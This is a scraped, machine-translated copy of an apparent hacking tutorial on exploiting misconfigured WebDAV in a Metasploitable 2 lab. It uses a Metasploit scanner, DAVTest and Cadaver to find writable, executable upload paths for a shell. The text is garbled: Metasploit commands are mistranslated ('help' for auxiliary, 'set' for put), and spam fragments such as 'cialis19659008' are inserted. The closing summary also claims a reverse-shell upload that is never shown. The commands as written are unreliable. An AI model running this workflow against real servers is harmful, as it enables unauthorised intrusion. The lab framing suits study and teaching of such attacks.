قالب وردپرس درنا توس
Home / Tips and Tricks / How to use WebDAV on a server and get a shell «Null Byte :: WonderHowTo

How to use WebDAV on a server and get a shell «Null Byte :: WonderHowTo



The internet has undoubtedly changed the way we work and communicate. With technological advances, more and more people around the world can collaborate on the internet. But this user-friendly environment inherently poses security risks & hackers always look for ways to operate systems for other uses.

WebDAV, or Web Distributed Authoring and Versioning, is a protocol that allows users to collaborate remotely and edit content on the web. It is an extension of HTTP, but uses its own individual functions to improve standard HTTP methods and headers.

The protocol is mainly used for remote editing and collaboration, but it can also be used to transfer files. It usually runs on port 80 by default, or sometimes on port 443 for encrypted communication. Although WebDAV provides users with the ability and convenience to access web content from anywhere, this external feature can be a huge vulnerability if it is not configured correctly.

In this self-study we use Metasploitable 2 as our goal and Kali Linux as our local machine. You can use a similar setup to follow if you want.

Step 1
: Check if WebDAV is enabled

The first thing to do is check if WebDAV is enabled on the target. Metasploit has a scanner that we can use for this, so start it up by typing msfconsole in the terminal. We can then locate the module with the command search :

  msf5> webdav search

Matching modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 help / scanner / http / dir_webdav_unicode_bypass normal Yes MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner
1 help / scanner / http / ms09_020_webdav_unicode_bypass normal Yes MS09-020 IIS6 WebDAV Unicode Authentication Bypass
2 help / scanner / http / webdav_internal_ip normal Yes HTTP WebDAV Internal IP scanner
3 help / scanner / http / webdav_scanner normal Yes HTTP WebDAV Scanner
4 help / scanner / http / webdav_website_content normal Yes HTTP WebDAV Website Content Scanner
5 exploit / multi / http / sun_jsws_dav_options 2010-01-20 great Yes Sun Java system Web server WebDAV OPTIONS Buffer overflow
6 exploit / multi / svn / svnserve_date 2004-05-19 average No subversion date Svnserve
7 exploit / osx / browser / safari_file_policy 2011-10-12 normal No Apple Safari file: // arbitrary code execution
8 exploit / windows / browser / java_ws_arginject_altjvm 2010-04-09 excellent No Sun Java Web Start plugin Command line Argument injection
9 exploit / windows / browser / java_ws_double_quote 2012-10-16 excellent No Sun Java Web Start Double Quote Injection
10 exploit / windows / browser / java_ws_vmargs 2012-02-14 excellent No Sun Java Web Start plug-in Command line Argument injection
11 exploit / windows / browser / keyhelp_launchtripane_exec 2012-06-26 excellent No vulnerability with KeyHelp ActiveX LaunchTriPane external code execution
12 exploit / windows / browser / ms07_017_ani_loadimage_chunksize 2007-03-28 great No Windows ANI LoadAniIcon () Chunk Size Stack Buffer Overflow (HTTP)
13 exploit / windows / browser / ms10_022_ie_vbscript_winhlp32 2010-02-26 great None MS10-022 Microsoft Internet Explorer Winhlp32.exe Run MSGBox code
14 exploit / windows / browser / ms10_042_helpctr_xss_cmd_exec 2010-06-09 excellent No Microsoft Help Center XSS and Command Execution
15 exploit / windows / browser / ms10_046_shortcut_icon_dllloader 2010-07-16 excellent No Microsoft Windows Shell LNK code version
16 exploit / windows / browser / oracle_webcenter_checkoutandopen 2013-04-16 excellent None Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution
17 exploit / windows / browser / ubisoft_uplay_cmd_exec 2012-07-29 normal None Ubisoft uplay 2.0.3 ActiveX Control random code execution
18 exploit / windows / browser / webdav_dll_hijacker 2010-08-18 manual No WebDAV Application DLL Hijacker
19 exploit / windows / http / sap_host_control_cmd_exec 2012-08-14 average Yes SAP NetWeaver HostControl Command Injection
20 exploit / windows / http / xampp_webdav_upload_php 2012-01-14 excellent None XAMPP WebDAV PHP Upload
21 exploit / windows / iis / iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
22 exploit / windows / iis / iis_webdav_upload_asp 2004-12-31 excellent None Microsoft IIS WebDAV Write Access Code Execution
23 exploit / windows / iis / ms03_007_ntdll_webdav 2003-05-30 great Yes MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
24 exploit / windows / local / ms16_016_webdav 2016-02-09 excellent Yes MS16-016 mrxdav.sys WebDav Local Privilege Escalation
25 exploit / windows / misc / ibm_director_cim_dllinject 2009-03-10 excellent Yes IBM System Director Agent DLL injection
26 exploit / windows / misc / vmhgfs_webdav_dll_sideload 2016-08-05 normal No DLL loading vulnerability when loading in VMware Host Guest Client Redirector
27 exploit / windows / misc / webdav_delivery 1999-01-01 manual No Serve DLL via webdav server
28 exploit / windows / scada / ge_proficy_cimplicity_gefebt 2014-01-23 excellent Yes GE Proficy CIMPLICITY gefebt.exe Implementation of external code
29 exploit / windows / ssl / ms04_011_pct 2004-04-13 average None MS04-011 Microsoft Private Communications Transport Overflow
30 post / windows / escalate / droplnk normal None Windows Escalate SMB Icon LNK Dropper 

We want the module webdav_scanner so load it with the command use :

  msf5> use help / scanner / http / webdav_scanner 

Now we can view the options for this module:

  msf5 help (scanner / http / webdav_scanner)> options

Module options (extra / scanner / http / webdav_scanner):

Name Current setting Required Description
---- --------------- -------- -----------
PATH / yes Path to use
Proxy & # 39; s no A format type proxy chain: host: port [,type:host:port][...]
     RHOSTS yes The target address range or CIDR ID
RPORT 80 yes The target port (TCP)
SSL false no Negotiating SSL / TLS for outgoing connections
THREAD 1 Yes The number of simultaneous threads
VHOST no HTTP server virtual host 

We now want to set the path to / dav / a folder that is often used for WebDAV:

  msf5 help (scanner / http / webdav_scanner)> set path / dav /

path => / dav / 

Then we can set rhosts to the IP address of our target:

  msf5 auxiliary (scanner / http / webdav_scanner)> set rhosts 10.10.0.50

rhosts => 10.10.0.50 

We must be good to go, so type run to start the module:

  msf5 help (scanner / http / webdav_scanner)> run

[+] 10.10.0.50 (Apache / 2.2.8 (Ubuntu) DAV / 2) ENABLE WEBDAV
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed 

The scanner returns some HTTP information, including the Apache version number and whether WebDAV is enabled or not. As we can see above, it is indeed turned on for our purpose.

Step 2: Test File Permissions with DAVTest

The next thing we want to do is test the permissions and policies for executing files on the server. Remember that our ultimate goal here is to get a reverse shell, so we need to know what we are up against.

DAVTest is a useful tool that will automatically test these things for us. Simply type davtest in the terminal to see the example of help and use:

  ~ # davtest

ERROR: missing -url

/ usr / bin / davtest -url  [options]

   -auth + Authorization (user: password)
-clean remove everything that has been uploaded when it is ready
-directory + postfix part of folder to create
-debug + DAV debug level 1-3 (2 & 3 log req / resp to /tmp/perldav_debug.txt)
- Move PUT text files and MOVE to executable
-Nocreate don't create a folder
-Still printing summary only
-rand + use this instead of any string for filenames
-sendbd + send back doors:
auto - for every successful test
ext - extension matching filename (s) in rear doors / orient
upload file + upload this file (requires upload loc)
- upload loc + upload file to this location / name (required - upload file)
-url + url from DAV location

Example: / usr / bin / davtest -url http: // localhost / davdir 

At the most basic level, we only need to provide a valid URL that points to a WebDAV instance. Of course use the switch -url followed by the correct URL.

Here we can see that the tool makes its magic work. It starts with testing the connection and tries to create a test folder, which we think is a success. DAVTest then sends different types of files to determine what can be uploaded. It seems that all of these succeed.

  ~ # davtest -url http://10.10.0.50/dav

******************************************************** ******
Test DAV connection
OPEN SUCCESSFUL: http://10.10.0.50/dav
******************************************************** ******
NOTE Random string for this session: 6WDIVTY
******************************************************** ******
Create directory
MKCOL SUCCEED: Created at http://10.10.0.50/dav/DavTestDir_6WDIVTY
******************************************************** ******
Send test files
PUT asp SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.asp
PUT txt SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.txt
PUT php SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.php
PUT jhtml SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.jhtml
PUT aspx SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.aspx
PUT cgi SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.cgi
PUT shtml SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.shtml
PUT cfm SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.cfm
PUT html SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.html
PUT jsp SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.jsp
PUT pl SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.pl
******************************************************** ******
Check for execution of test files
EXEC asp FAIL
EXEC txt SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.txt
EXEC php SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.php
EXEC jhtml FAIL
EXEC aspx FAIL
EXEC cgi FAIL
EXEC shtml FAIL
EXEC cfm FAIL
EXEC html SUCCEED: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.html
EXEC jsp FAIL
EXEC pl FAILED

******************************************************** ******
/ usr / bin / davtest Summary:
Created: http://10.10.0.50/dav/DavTestDir_6WDIVTY
PUT file: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.asp
PUT file: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.txt
PUT file: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.php
PUT file: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.jhtml
PUT file: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.aspx
PUT file: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.cgi
PUT file: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.shtml
PUT file: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.cfm
PUT file: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.html
PUT file: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.jsp
PUT file: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.pl
Executed: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.txt
Performs: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.php
Performed: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.html cialis19659008 council. At the end of the output above we see the good things: testing for executing files. We can see that most fail, but TXT, HTML and perhaps the most important for us, PHP files, will all be successfully executed. All we have to do now is find a way to upload our shell. 

Step 3: Upload the shell with Cadaver

For the final phase of our attack we use a tool called Cadaver, which provides an intuitive interface for interaction with the WebDAV service - with FTP-like commands that easy to use.

We can view the help and usage information by typing cadaver -h in the terminal:

  ~ # cadaver -h

Usage: cadaver [OPTIONS] http: // hostname [:port] / path
Port is set to 80 by default, path is set to & # 39; / & # 39;
options:
-t, --tolerant Allow cd / open in non-WebDAV compatible collection.
-r, --rcfile = FILE Read FILE script instead of ~ / .cadaverrc.
-p, --proxy = PROXY [:PORT] Use proxy host PROXY and optional proxy port PORT.
-V, --version View version information.
-h, --help View this help message.
Please send bug reports and function requests to  

Let's test it with a harmless text file before we start uploading our shell. First create a simple text file:

  root @ drd: ~ # echo & # 39; TESTING & # 39;> test.txt 

We can then connect to WebDAV via Cadaver by entering the correct URL: [19659007] ~ # cadaver http: //10.10.0.50/dav

dav: / dav />

Type ? or help at the prompt:

  dav: / dav />? for a list of available assignments.

Available commands & # 39; s:
ls cd pwd put get mget mput
edit less delete mkcol cat rmcol copy
move lock unlock discover steel showlocks version
checkin checkout checkout history label propnames chexec
propget propdel propset search set open close
echo stop disabled lcd lls lpwd log out
help describe about
Aliases: rm = delete, mkdir = mkcol, mv = move, cp = copy, more = less, quit = exit = bye 

We can use the put command to upload our test file:

  dav: / dav / > set test.txt

Upload Test.txt to `/dav/test.txt & # 39 ;:
Progress: [=============================>] 100.0% of 8 bytes passed. 

If we now navigate to it in the browser, we should see the text that is displayed to us:

Wrapping

In this tutorial we learned about WebDAV and how we could exploit a misconfigured version of it to get shell access. First we used a Metasploit scanner to determine if WebDAV was active on the target. We were then able to test the file execution policy with a tool called DAVTest. Finally, we used Cadaver to upload a reverse shell and to compromise the server. Although external access is a convenient way to collaborate, hackers always try to use it for their own use.

Cover image by Pixabay / Pexels; Screenshots of drd_ / Null Byte

Source link